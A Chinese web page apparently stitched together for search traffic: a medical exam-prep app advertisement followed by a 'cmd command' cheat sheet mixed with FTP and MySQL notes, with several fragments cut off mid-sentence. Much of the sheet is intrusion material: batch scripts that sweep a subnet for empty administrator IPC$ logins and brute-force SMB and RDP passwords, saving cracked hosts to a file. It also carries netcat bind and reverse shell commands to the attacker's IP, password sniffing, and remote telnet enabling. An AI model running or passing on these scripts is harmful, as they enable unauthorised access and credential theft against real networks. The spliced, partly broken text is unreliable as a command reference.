cmd 關(guān)機(jī)(win10如何運(yùn)行cmd命令)

Cmd命令百科：計(jì)算機(jī)專家必須知道的win10 cmd命令摘要

中國(guó)教育簡(jiǎn)介。

中宇教育電腦版是一個(gè)與醫(yī)學(xué)相關(guān)的知識(shí)教育平臺(tái)。平臺(tái)有海量的知識(shí)和教育資源給大家，幫助用戶在平臺(tái)上學(xué)習(xí)和穩(wěn)定知識(shí)。界面上的這些教育可以進(jìn)行分類，通過(guò)平臺(tái)上的知識(shí)類型，選擇自己需要學(xué)習(xí)的科目。

幫助用戶復(fù)習(xí)考試。中宇教育是集醫(yī)師資格考試、藥師資格考試、中醫(yī)技術(shù)培訓(xùn)、考研、健康管理師、學(xué)歷教育等教學(xué)科研為一體的專業(yè)大型考前輔導(dǎo)機(jī)構(gòu)。

中域教育軟件的功能

1、錯(cuò)題集訓(xùn)練

允許專業(yè)知識(shí)的盲區(qū)，保持訓(xùn)練。

2.考試中的緊迫問(wèn)題

考試中的關(guān)鍵題，數(shù)據(jù)分析，必考題一定在其中，通過(guò)率在90%以上！

3、章節(jié)目錄培訓(xùn)控制模塊

整個(gè)考點(diǎn)涵蓋習(xí)題和試題，由數(shù)十名教研員進(jìn)行分析和解答；

4、日歷年測(cè)試控制模塊

歷年考題有近幾年的統(tǒng)考試卷，統(tǒng)考模擬卷，實(shí)戰(zhàn)演練。往年的考題都在這，隨時(shí)隨地都可以升級(jí)！

中宇教育軟件的特點(diǎn)

【研究生課程互聯(lián)網(wǎng)大數(shù)據(jù)】

全方位百度收錄了中國(guó)歷年考研題，考研真題，考研真題解析，更有國(guó)內(nèi)名師精英團(tuán)隊(duì)產(chǎn)品研發(fā)的考研內(nèi)容，方便大家記憶考研知識(shí)要點(diǎn)?？佳蓄}盡量給你一個(gè)深度的科研和對(duì)每個(gè)考點(diǎn)的把握。

【考研視頻反饋活動(dòng)】

全方位百度收錄，直播考研課程視頻。名師龐小云、余和他們的考研老師、碧?？佳欣蠋?、考研老師、考研老師打造了考研領(lǐng)域最多的在線課程，還有著名醫(yī)學(xué)考研老師劉，

張遠(yuǎn)方等重磅消息出擊，全方位考研視頻繽紛展示。

【高成功率研究生課程內(nèi)容】

醫(yī)學(xué)研究生最頭疼的就是西醫(yī)綜合類研究生課程，中醫(yī)綜合類研究生課程，口腔?？疲t(yī)學(xué)考研?？?，非常全面。中檔文化教育從一開(kāi)始就擅長(zhǎng)醫(yī)學(xué)考研，中檔考研老師對(duì)醫(yī)學(xué)考研水平有個(gè)人見(jiàn)解。

【考研詞匯英語(yǔ)巧妙回憶】

考研英語(yǔ)詞匯大全，以及考研英語(yǔ)題庫(kù)的巧妙筆記，結(jié)合5500個(gè)考研詞匯。

中宇教育軟件亮點(diǎn)

1.支持手機(jī)、電腦、iPad上課，在家就可以和老師互動(dòng)；

2.大數(shù)據(jù)個(gè)性化教學(xué)，課件基于學(xué)生能力定制，課程匹配海量測(cè)試數(shù)據(jù)；

3.支持課程結(jié)束后無(wú)限播放。如果錯(cuò)過(guò)了課程或者沒(méi)聽(tīng)懂，就回放一下，及時(shí)復(fù)習(xí)。選擇中域的直播類！你選擇了成功！

中域教育更新日志

1.細(xì)節(jié)更出眾!

2.BUG去無(wú)蹤

cmd命令大全：電腦高手必需知道的win10 cmd命令匯總

system 顯示遠(yuǎn)端主機(jī)系統(tǒng)類型

user user-name [password] [account] 重新以別的用戶名登錄遠(yuǎn)端主機(jī)

open host [port] 重新建立一個(gè)新的連接

prompt 交互提示模式

macdef 定義宏命令

lcd 改變當(dāng)前本地主機(jī)的工作目錄，如果缺省，就轉(zhuǎn)到當(dāng)前用戶的HOME目錄

chmod 改變遠(yuǎn)端主機(jī)的文件權(quán)限

case 當(dāng)為ON時(shí)，用MGET命令拷貝的文件名到本地機(jī)器中，全部轉(zhuǎn)換為小寫字母

cd remote-dir 進(jìn)入遠(yuǎn)程主機(jī)目錄

cdup 進(jìn)入遠(yuǎn)程主機(jī)目錄的父目錄

! 在本地機(jī)中執(zhí)行交互shell，exit回到ftp環(huán)境，如!ls*.zip

#5

MYSQL 命令

mysql -h主機(jī)地址-u用戶名-p密碼連接MYSQL;如果剛安裝好MYSQL，超級(jí)用戶root是沒(méi)有密碼的。

(例：mysql -h110.110.110.110 -Uroot -P123456

注：u與root可以不用加空格，其它也一樣)

exit 退出MYSQL

mysqladmin -u用戶名-p舊密碼password 新密碼修改密碼

grant select on 數(shù)據(jù)庫(kù).* to 用戶名@登錄主機(jī)identified by '密碼'; 增加新用戶。(注意：和上面不同，下面的因?yàn)槭荕YSQL環(huán)境中的命令，

所以后面都帶一個(gè)分號(hào)作為命令結(jié)束符)

show databases; 顯示數(shù)據(jù)庫(kù)列表。剛開(kāi)始時(shí)才兩個(gè)數(shù)據(jù)庫(kù)：mysql和test。mysql庫(kù)很重要它里面有MYSQL的系統(tǒng)信息，我們改密碼和新增用戶，實(shí)際上就是用這個(gè)庫(kù)進(jìn)行操作。

use mysql;

show tables; 顯示庫(kù)中的數(shù)據(jù)表

describe 表名； 顯示數(shù)據(jù)表的結(jié)構(gòu)

create database 庫(kù)名； 建庫(kù)

use 庫(kù)名；

create table 表名(字段設(shè)定列表); 建表

drop database 庫(kù)名；

drop table 表名； 刪庫(kù)和刪表

delete from 表名； 將表中記錄清空

select * from 表名； 顯示表中的記錄

mysqldump --opt schoolschool.bbb 備份數(shù)據(jù)庫(kù)：(命令在DOS的mysqlin目錄下執(zhí)行);注釋：將數(shù)據(jù)庫(kù)school備份到school.bbb文件，

school.bbb是一個(gè)文本文件，文件名任取，打開(kāi)看看你會(huì)有新發(fā)現(xiàn)。

win2003系統(tǒng)下新增命令(實(shí)用部份)：

shutdown /參數(shù)關(guān)閉或重啟本地或遠(yuǎn)程主機(jī)。

參數(shù)說(shuō)明：/S 關(guān)閉主機(jī)，/R 重啟主機(jī)， /T 數(shù)字設(shè)定延時(shí)的時(shí)間，范圍0180秒之間， /A取消開(kāi)機(jī)，/M //IP 指定的遠(yuǎn)程主機(jī)。

例：shutdown /r /t 0 立即重啟本地主機(jī)(無(wú)延時(shí))

taskill /參數(shù)進(jìn)程名或進(jìn)程的pid 終止一個(gè)或多個(gè)任務(wù)和進(jìn)程。

參數(shù)說(shuō)明：/PID 要終止進(jìn)程的pid,可用tasklist命令獲得各進(jìn)程的pid，/IM 要終止的進(jìn)程的進(jìn)程名，/F 強(qiáng)制終止進(jìn)程，/T 終止指定的進(jìn)程及他所啟動(dòng)的子進(jìn)程。

tasklist 顯示當(dāng)前運(yùn)行在本地和遠(yuǎn)程主機(jī)上的進(jìn)程、服務(wù)、服務(wù)各進(jìn)程的進(jìn)程標(biāo)識(shí)符(PID)。

參數(shù)說(shuō)明：/M 列出當(dāng)前進(jìn)程加載的dll文件，/SVC 顯示出每個(gè)進(jìn)程對(duì)應(yīng)的服務(wù)，無(wú)參數(shù)時(shí)就只列出當(dāng)前的進(jìn)程。

linux系統(tǒng)下基本命令　注：要區(qū)分大小寫

uname 顯示版本信息(同win2K的ver)

dir 顯示當(dāng)前目錄文件，ls -al 顯示包括隱藏文件(同win2K的dir)

pwd 查詢當(dāng)前所在的目錄位置

cd cd　.回到上一層目錄，注意cd 與.之間有空格。cd　/返回到根目錄。

cat 文件名查看文件內(nèi)容

cat abc.txt 往abc.txt文件中寫上內(nèi)容。

more 文件名以一頁(yè)一頁(yè)的方式顯示一個(gè)文本文件。

cp 復(fù)制文件

mv 移動(dòng)文件

rm 文件名刪除文件，rm -a 目錄名刪除目錄及子目錄

mkdir 目錄名建立目錄

rmdir 刪除子目錄，目錄內(nèi)沒(méi)有文檔。

chmod 設(shè)定檔案或目錄的存取權(quán)限

grep 在檔案中查找字符串

diff 檔案文件比較

find 檔案搜尋

date 現(xiàn)在的日期、時(shí)間

who 查詢目前和你使用同一臺(tái)機(jī)器的人以及Login時(shí)間地點(diǎn)

w 查詢目前上機(jī)者的詳細(xì)資料

whoami 查看自己的帳號(hào)名稱

groups 查看某人的Group

passwd 更改密碼

history 查看自己下過(guò)的命令

ps 顯示進(jìn)程狀態(tài)

kill 停止某進(jìn)程

gcc 黑客通常用它來(lái)編譯C語(yǔ)言寫的文件

su 權(quán)限轉(zhuǎn)換為指定使用者

telnet IP telnet連接對(duì)方主機(jī)(同win2K)，當(dāng)出現(xiàn)bash$時(shí)就說(shuō)明連接成功。

ftp ftp連接上某服務(wù)器(同win2K)

批處理命令與變量

1：for命令及變量基本格式

FOR /參數(shù)%variable IN (set) DO command [command_parameters] %variable:指定一個(gè)單一字母可替換的參數(shù)，如：%i ，

而指定一個(gè)變量則用：%%i ，而調(diào)用變量時(shí)用：%i% ，變量是區(qū)分大小寫的(%i 不等于%I)。

批處理每次能處理的變量從%0—%9共10個(gè)，其中%0默認(rèn)給批處理文件名使用，%1默認(rèn)為使用此批處理時(shí)輸入的的第一個(gè)值，

同理：%2—%9指輸入的第2-9個(gè)值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個(gè)或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個(gè)'1'指起始值，第二個(gè)'1'指增長(zhǎng)量，

第三個(gè)'254'指結(jié)束值，即：從1到254;“(1 -1 254)”說(shuō)明：即從254到1 }

command：指定對(duì)第個(gè)文件執(zhí)行的命令，如：net use命令；如要執(zhí)行多個(gè)命令時(shí)，命令這間加： 來(lái)隔開(kāi)

command_parameters：為特定命令指定參數(shù)或命令行開(kāi)關(guān)

IN (set)：指在(set)中取值；DO command ：指執(zhí)行command

參數(shù)：/L 指用增量形式{ (set)為增量形式時(shí)};/F 指從文件中不斷取值，直到取完為止{ (set)為文件時(shí)，如(d:pass.txt)時(shí)}。

用法舉例：

@echo off

echo 用法格式：test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use %1.%%G /user:administrator | find '命令成功完成' test.txt

存為test.bat 說(shuō)明：對(duì)指定的一個(gè)C類網(wǎng)段的254個(gè)IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式(即從1-254或254-1);輸入的IP前面三位：*.*.*為批處理默認(rèn)的%1;%%G 為變量(ip的最后一位); 用來(lái)隔開(kāi)echo 和net use 這二個(gè)命令；| 指建立了ipc$后，

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200

存為：ok.exe 說(shuō)明：輸入一個(gè)IP后，用字典文件d:pass.dic來(lái)暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址(默認(rèn))。

七：

2：if命令及變量基本格式

IF [not] errorlevel 數(shù)字命令語(yǔ)句如果程序運(yùn)行最后返回一個(gè)等于或大于指定數(shù)字的退出編碼，指定條件為“真”。

例：IF errorlevel 0 命令指程序執(zhí)行后返回的值為0時(shí)，就值行后面的命令；IF not errorlevel 1 命令指程序執(zhí)行最后返回的值不等于1，就執(zhí)行后面的命令。

0 指發(fā)現(xiàn)并成功執(zhí)行(真);1 指沒(méi)有發(fā)現(xiàn)、沒(méi)執(zhí)行(假)。

IF [not] 字符串1==字符串2 命令語(yǔ)句如果指定的文本字符串匹配(即：字符串1 等于字符串2)，就執(zhí)行后面的命令。

例：“if '%2%'=='4' goto start”指：如果輸入的第二個(gè)變量為4時(shí)，執(zhí)行后面的命令(注意：調(diào)用變量時(shí)就%變量名%并加' ')

IF [not] exist 文件名命令語(yǔ)句如果指定的文件名存在，就執(zhí)行后面的命令。

例：“if not nc.exe goto end”指：如果沒(méi)有發(fā)現(xiàn)nc.exe文件就跳到':end'標(biāo)簽處。

IF [not] errorlevel 數(shù)字命令語(yǔ)句else 命令語(yǔ)句或IF [not] 字符串1==字符串2 命令語(yǔ)句else 命令語(yǔ)句或IF [not] exist 文件名命令語(yǔ)句else 命令語(yǔ)句加上：else 命令語(yǔ)句后指：當(dāng)前面的條件不成立時(shí)，

系統(tǒng)外部命令

注：系統(tǒng)外部命令(均需下載相關(guān)工具)

瑞士軍刀：nc.exe

參數(shù)說(shuō)明：

-h 查看幫助信息

-d 后臺(tái)模式

-e prog程序重定向，一但連接就執(zhí)行[危險(xiǎn)]

-i secs延時(shí)的間隔

-l 監(jiān)聽(tīng)模式，用于入站連接

-L 監(jiān)聽(tīng)模式，連接天閉后仍然繼續(xù)監(jiān)聽(tīng)，直到CTR+C

-n IP地址，不能用域名

-o film記錄16進(jìn)制的傳輸

-p[空格]端口本地端口號(hào)

-r 隨機(jī)本地及遠(yuǎn)程端口

-t 使用Telnet交互方式

-u UDP模式

-v 詳細(xì)輸出，用-vv將更詳細(xì)

-w數(shù)字timeout延時(shí)間隔

-z 將輸入，輸出關(guān)掉(用于掃錨時(shí))

基本用法：

nc -nvv 192.168.0.1 80 連接到192.168.0.1主機(jī)的80端口

nc -l -p 80 開(kāi)啟本機(jī)的TCP 80端口并監(jiān)聽(tīng)

nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機(jī)的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機(jī)的cmdshell并反向連接192.168.0.2的5354端口

高級(jí)用法：

nc -L -p 80 作為蜜罐用1：開(kāi)啟并不停地監(jiān)聽(tīng)80端口，直到CTR+C為止

nc -L -p 80 c:log.txt 作為蜜罐用2：開(kāi)啟并不停地監(jiān)聽(tīng)80端口，直到CTR+C,同時(shí)把結(jié)果輸出到c:log.txt

nc -L -p 80 c:honeyport.txt 作為蜜罐用3-1：開(kāi)啟并不停地監(jiān)聽(tīng)80端口，直到CTR+C,并把c:honeyport.txt中內(nèi)容送入管道中，亦可起到傳送文件作用

type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開(kāi)啟并不停地監(jiān)聽(tīng)80端口，

直到CTR+C,并把c:honeyport.txt中內(nèi)容送入管道中，亦可起到傳送文件作用

本機(jī)上用：nc -l -p 本機(jī)端口

在對(duì)方主機(jī)上用：nc -e cmd.exe 本機(jī)IP -p 本機(jī)端口*win2K

nc -e /bin/sh 本機(jī)IP -p 本機(jī)端口*linux,unix 反向連接突破對(duì)方主機(jī)的防火墻

本機(jī)上用：nc -d -l -p 本機(jī)端口 要傳送的文件路徑及名稱

在對(duì)方主機(jī)上用：nc -vv 本機(jī)IP 本機(jī)端口 存放文件的路徑及名稱傳送文件到對(duì)方主機(jī)

備注：

| 管道命令

或 重定向命令?！啊?，例如：tlntadmn test.txt 指把test.txt的內(nèi)容賦值給tlntadmn命令

@ 表示執(zhí)行@后面的命令，但不會(huì)顯示出來(lái)(后臺(tái)執(zhí)行);例：@dir c:winnt d:log.txt 意思是：后臺(tái)執(zhí)行dir，并把結(jié)果存在d:log.txt中

與的區(qū)別''指：覆蓋；''指：保存到(添加到)。

如：@dir c:winnt d:log.txt和@dir c:winnt d:log.txt二個(gè)命令分別執(zhí)行二次比較看：用的則是把二次的結(jié)果都保存了，而用：則只有一次的結(jié)果，

是因?yàn)榈诙蔚慕Y(jié)果把第一次的覆蓋了。

八：

掃描工具：xscan.exe

基本格式

xscan -host 起始IP[-終止IP] 檢測(cè)項(xiàng)目[其他選項(xiàng)] 掃錨'起始IP到終止IP'段的所有主機(jī)信息

xscan -file 主機(jī)列表文件名檢測(cè)項(xiàng)目[其他選項(xiàng)] 掃錨'主機(jī)IP列表文件名'中的所有主機(jī)信息

檢測(cè)項(xiàng)目

-active 檢測(cè)主機(jī)是否存活

-os 檢測(cè)遠(yuǎn)程操作系統(tǒng)類型(通過(guò)NETBIOS和SNMP協(xié)議)

-port 檢測(cè)常用服務(wù)的端口狀態(tài)

-ftp 檢測(cè)FTP弱口令

-pub 檢測(cè)FTP服務(wù)匿名用戶寫權(quán)限

-pop3 檢測(cè)POP3-Server弱口令

-smtp 檢測(cè)SMTP-Server漏洞

-sql 檢測(cè)SQL-Server弱口令

-smb 檢測(cè)NT-Server弱口令

-iis 檢測(cè)IIS編碼/解碼漏洞

-cgi 檢測(cè)CGI漏洞

-nasl 加載Nessus攻擊腳本

-all 檢測(cè)以上所有項(xiàng)目

其它選項(xiàng)

-i 適配器編號(hào)設(shè)置網(wǎng)絡(luò)適配器， 適配器編號(hào)可通過(guò)'-l'參數(shù)獲取

-l 顯示所有網(wǎng)絡(luò)適配器

-v 顯示詳細(xì)掃描進(jìn)度

-p 跳過(guò)沒(méi)有響應(yīng)的主機(jī)

-o 跳過(guò)沒(méi)有檢測(cè)到開(kāi)放端口的主機(jī)

-t 并發(fā)線程數(shù)量，并發(fā)主機(jī)數(shù)量指定最大并發(fā)線程數(shù)量和并發(fā)主機(jī)數(shù)量， 默認(rèn)數(shù)量為100,10

-log 文件名指定掃描報(bào)告文件名(后綴為：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p　檢測(cè)192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的所有漏洞，

跳過(guò)無(wú)響應(yīng)的主機(jī)

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測(cè)192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的標(biāo)準(zhǔn)端口狀態(tài)，

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測(cè)“hostlist.txt”文件中列出的所有主機(jī)的標(biāo)準(zhǔn)端口狀態(tài)，CGI漏洞，

最大并發(fā)線程數(shù)量為200，同一時(shí)刻最多檢測(cè)5臺(tái)主機(jī)，顯示詳細(xì)檢測(cè)進(jìn)度，跳過(guò)沒(méi)有檢測(cè)到開(kāi)放端口的主機(jī)

九：

命令行方式嗅探器： xsniff.exe

可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼

參數(shù)說(shuō)明

-tcp 輸出TCP數(shù)據(jù)報(bào)

-udp 輸出UDP數(shù)據(jù)報(bào)

-icmp 輸出ICMP數(shù)據(jù)報(bào)

-pass 過(guò)濾密碼信息

-hide 后臺(tái)運(yùn)行

-host 解析主機(jī)名

-addr IP地址過(guò)濾IP地址

-port 端口過(guò)濾端口

-log 文件名將輸出保存到文件

-asc 以ASCII形式輸出

-hex 以16進(jìn)制形式輸出

用法示例

xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過(guò)濾tcp和udp信息并以ASCII格式輸出

終端服務(wù)密碼破解： tscrack.exe

參數(shù)說(shuō)明

-h 顯示使用幫助

-v 顯示版本信息

-s 在屏幕上打出解密能力

-b 密碼錯(cuò)誤時(shí)發(fā)出的聲音

-t 同是發(fā)出多個(gè)連接(多線程)

-N Prevent System Log entries on targeted server

-U 卸載移除tscrack組件

-f 使用-f后面的密碼

-F 間隔時(shí)間(頻率)

-l 使用-l后面的用戶名

-w 使用-w后面的密碼字典

-p 使用-p后面的密碼

-D 登錄主頁(yè)面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic 遠(yuǎn)程用密碼字典文件暴破主機(jī)的administrator的登陸密碼

tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠(yuǎn)程登陸192.168.0.1的administrator用戶

@if not exist ipcscan.txt goto noscan

@for /f 'tokens=1 delims=' %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(存為3389.bat) (假設(shè)現(xiàn)有用SuperScan或其它掃錨器掃到一批開(kāi)有3389的主機(jī)IP列表文件3389.txt)

3389.bat意思是：從3389.txt文件中取一個(gè)IP，接著運(yùn)行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(存為hack.bat) (運(yùn)行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個(gè)目錄下；就可以等待結(jié)果了)

hack.bat意思是：運(yùn)行tscrack.exe用字典暴破3389.txt中所有主機(jī)的administrator密碼，并將破解結(jié)果保存在rouji.txt文件中。

其它

Shutdown.exe

Shutdown IP地址t:20 20秒后將對(duì)方NT自動(dòng)關(guān)閉(Windows 2003系統(tǒng)自帶工具，在Windows2000下用進(jìn)就得下載此工具才能用。

在前面Windows 2003 DOS命令中有詳細(xì)介紹。)

fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細(xì)說(shuō)明(端口重定向繞過(guò)防火墻)

fpipe -l 80 -s 1029 -r 80 當(dāng)有人掃錨你的80端口時(shí)，他掃到的結(jié)果會(huì)完全是的主機(jī)信息

Fpipe -l 23 -s 88 -r 23 目標(biāo)IP 把本機(jī)向目標(biāo)IP發(fā)送的23端口Telnet請(qǐng)求經(jīng)端口重定向后，就通過(guò)88端口發(fā)送到目標(biāo)IP的23端口。

(與目標(biāo)IP建立Telnet時(shí)本機(jī)就用的88端口與其相連接)然后：直接Telnet 127.0.0.1(本機(jī)IP)就連接到目標(biāo)IP的23端口了。

OpenTelnet.exe (遠(yuǎn)程開(kāi)啟telnet工具)

opentelnet.exe IP 帳號(hào)　密碼　ntlm認(rèn)證方式　Telnet端口(不需要上傳ntlm.exe破壞微軟的身份驗(yàn)證方式)直接遠(yuǎn)程開(kāi)啟對(duì)方的telnet服務(wù)后，

就可用telnet ip 連接上對(duì)方。

NTLM認(rèn)證方式：0：不使用NTLM身份驗(yàn)證；1：先嘗試NTLM身份驗(yàn)證，如果失敗，再使用用戶名和密碼；2：只使用NTLM身份驗(yàn)證。

ResumeTelnet.exe (OpenTelnet附帶的另一個(gè)工具)

resumetelnet.exe IP　帳號(hào)　密碼用Telnet連接完對(duì)方后，就用這個(gè)命令將對(duì)方的Telnet設(shè)置還原，并同時(shí)關(guān)閉Telnet服務(wù)。

FTP命令詳解

FTP命令是Internet用戶使用最頻繁的命令之一，熟悉并靈活應(yīng)用FTP的內(nèi)部命令，可以大大方便使用者，并收到事半功倍之效。如果你想學(xué)習(xí)使用進(jìn)行后臺(tái)FTP下載，那么就必須學(xué)習(xí)FTP指令。

FTP的命令行格式為：

ftp -v -d -i -n -g [主機(jī)名] ，其中

-v 顯示遠(yuǎn)程服務(wù)器的所有響應(yīng)信息

-n 限制ftp的自動(dòng)登錄，即不使用；n etrc文件；

-d 使用調(diào)試方式；

-g 取消全局文件名。

FTP使用的內(nèi)部命令如下(中括號(hào)表示可選項(xiàng)):

1.[cmd[args]]：在本地機(jī)中執(zhí)行交互shell，exit回到ftp環(huán)境，如：ls*.zip

2.$ macro-ame[args]： 執(zhí)行宏定義macro-name。

3.account[password]： 提供登錄遠(yuǎn)程系統(tǒng)成功后訪問(wèn)系統(tǒng)資源所需的補(bǔ)充口令。

4.append local-file[remote-file]：將本地文件追加到遠(yuǎn)程系統(tǒng)主機(jī)，若未指定遠(yuǎn)程系統(tǒng)文件名，則使用本地文件名。

5.ascii：使用ascii類型傳輸方式。

6.bell：每個(gè)命令執(zhí)行完畢后計(jì)算機(jī)響鈴一次。

7.bin：使用二進(jìn)制文件傳輸方式。

8.bye：退出ftp會(huì)話過(guò)程。

9.case：在使用mget時(shí)，將遠(yuǎn)程主機(jī)文件名中的大寫轉(zhuǎn)為小寫字母。

10. cd remote-dir：進(jìn)入遠(yuǎn)程主機(jī)目錄。

11.cdup：進(jìn)入遠(yuǎn)程主機(jī)目錄的父目錄。

12.chmod mode file-name：將遠(yuǎn)程主機(jī)文件file-name的存取方式設(shè)置為mode，如：chmod 777 a.out。

13.close：中斷與遠(yuǎn)程服務(wù)器的ftp會(huì)話(與open對(duì)應(yīng))。

14 .cr：使用asscii方式傳輸文件時(shí)，將回車換行轉(zhuǎn)換為回行。

15.delete remote-file：刪除遠(yuǎn)程主機(jī)文件。

16.debug[debug-value]：設(shè)置調(diào)試方式， 顯示發(fā)送至遠(yuǎn)程主機(jī)的每條命令，如：deb up 3，若設(shè)為0，表示取消debug。

17.dir[remote-dir][local-file]：顯示遠(yuǎn)程主機(jī)目錄，并將結(jié)果存入本地文件。

18.disconnection：同close。

19.form format：將文件傳輸方式設(shè)置為format，缺省為file方式。

20.get remote-file[local-file]： 將遠(yuǎn)程主機(jī)的文件remote-file傳至本地硬盤的local-file。

21.glob：設(shè)置mdelete，mget，mput的文件名擴(kuò)展，缺省時(shí)不擴(kuò)展文件名，同命令行的-g參數(shù)。

22.hash：每傳輸1024字節(jié)，顯示一個(gè)hash符號(hào)(#)。

23.help[cmd]：顯示ftp內(nèi)部命令cmd的幫助信息，如：help get。

24.idle[seconds]：將遠(yuǎn)程服務(wù)器的休眠計(jì)時(shí)器設(shè)為[seconds]秒。

25.image：設(shè)置二進(jìn)制傳輸方式(同binary)。

26.lcd[dir]：將本地工作目錄切換至dir。

27. ls[remote-dir][local-file]：顯示遠(yuǎn)程目錄remote-dir， 并存入本地文件local-file。

28.macdef macro-name：定義一個(gè)宏，遇到macdef下的空行時(shí)，宏定義結(jié)束。

29.mdelete[remote-file]：刪除遠(yuǎn)程主機(jī)文件。

30.mdir remote-files local-file：與dir類似，但可指定多個(gè)遠(yuǎn)程文件，如：mdir *.o.*.zipoutfile 。

31.mget remote-files：傳輸多個(gè)遠(yuǎn)程文件。

32.mkdir dir-name：在遠(yuǎn)程主機(jī)中建一目錄。

33.mls remote-file local-file：同nlist，但可指定多個(gè)文件名。

34.mode[modename]：將文件傳輸方式設(shè)置為modename， 缺省為stream方式。

35.modtime file-name：顯示遠(yuǎn)程主機(jī)文件的最后修改時(shí)間。

36.mput local-file：將多個(gè)文件傳輸至遠(yuǎn)程主機(jī)。

37.newer file-name： 如果遠(yuǎn)程機(jī)中file-name的修改時(shí)間比本地硬盤同名文件的時(shí)間更近，則重傳該文件。

38.nlist[remote-dir][local-file]：顯示遠(yuǎn)程主機(jī)目錄的文件清單，并存入本地硬盤的local-file。

39.nmap[inpattern outpattern]：設(shè)置文件名映射機(jī)制， 使得文件傳輸時(shí)，文件中的某些字符相互轉(zhuǎn)換， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，

則傳輸文件a1.a2.a3時(shí)，文件名變?yōu)閍1，a2。 該命令特別適用于遠(yuǎn)程主機(jī)為非UNIX機(jī)的情況。

40.ntrans[inchars[outchars]]：設(shè)置文件名字符的翻譯機(jī)制，如ntrans1R，則文件名LLL將變?yōu)镽RR。

41.open host[port]：建立指定ftp服務(wù)器連接，可指定連接端口。

42.passive：進(jìn)入被動(dòng)傳輸方式。

43.prompt：設(shè)置多個(gè)文件傳輸時(shí)的交互提示。

44.proxy ftp-cmd：在次要控制連接中，執(zhí)行一條ftp命令， 該命令允許連接兩個(gè)ftp服務(wù)器，以在兩個(gè)服務(wù)器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個(gè)服務(wù)器間的連接。

45.put local-file[remote-file]：將本地文件local-file傳送至遠(yuǎn)程主機(jī)。

46.pwd：顯示遠(yuǎn)程主機(jī)的當(dāng)前工作目錄。

47.quit：同bye，退出ftp會(huì)話。

48.quote arg1，arg2.將參數(shù)逐字發(fā)至遠(yuǎn)程ftp服務(wù)器，如：quote syst.

49.recv remote-file[local-file]：同get。

50.reget remote-file[local-file]：類似于get， 但若local-file存在，則從上次傳輸中斷處續(xù)傳。

51.rhelp[cmd-name]：請(qǐng)求獲得遠(yuǎn)程主機(jī)的幫助。

52.rstatus[file-name]：若未指定文件名，則顯示遠(yuǎn)程主機(jī)的狀態(tài)， 否則顯示文件狀態(tài)。

53.rename[from][to]：更改遠(yuǎn)程主機(jī)文件名。

54.reset：清除回答隊(duì)列。

55.restart marker：從指定的標(biāo)志marker處，重新開(kāi)始get或put，如：restart 130。

56.rmdir dir-name：刪除遠(yuǎn)程主機(jī)目錄。

57.runique：設(shè)置文件名只一性存儲(chǔ)，若文件存在，則在原文件后加后綴.1，2等。

58.send local-file[remote-file]：同put。

59.sendport：設(shè)置PORT命令的使用。

60.site arg1，arg2.將參數(shù)作為SITE命令逐字發(fā)送至遠(yuǎn)程ftp主機(jī)。

61.size file-name：顯示遠(yuǎn)程主機(jī)文件大小，如：site idle 7200。

62.status：顯示當(dāng)前ftp狀態(tài)。

63.struct[struct-name]：將文件傳輸結(jié)構(gòu)設(shè)置為struct-name， 缺省時(shí)使用stream結(jié)構(gòu)。

64.sunique：將遠(yuǎn)程主機(jī)文件名存儲(chǔ)設(shè)置為只一(與runique對(duì)應(yīng))。

65.system：顯示遠(yuǎn)程主機(jī)的操作系統(tǒng)類型。

66.tenex：將文件傳輸類型設(shè)置為TENEX機(jī)的所需的類型。

67.tick：設(shè)置傳輸時(shí)的字節(jié)計(jì)數(shù)器。

68.trace：設(shè)置包跟蹤。

69.type[type-name]：設(shè)置文件傳輸類型為type-name，缺省為ascii，如：type binary，設(shè)置二進(jìn)制傳輸方式。

70.umask[newmask]：將遠(yuǎn)程服務(wù)器的缺省umask設(shè)置為newmask，如：umask 3

71.user user-name[password][account]：向遠(yuǎn)程主機(jī)表明自己的身份，需要口令時(shí)，必須輸入口令，如：user anonymous my@email。

72.verbose：同命令行的-v參數(shù)，即設(shè)置詳盡報(bào)告方式，ftp 服務(wù)器的所有響應(yīng)都將顯示給用戶，缺省為on.

73.[cmd]：同help.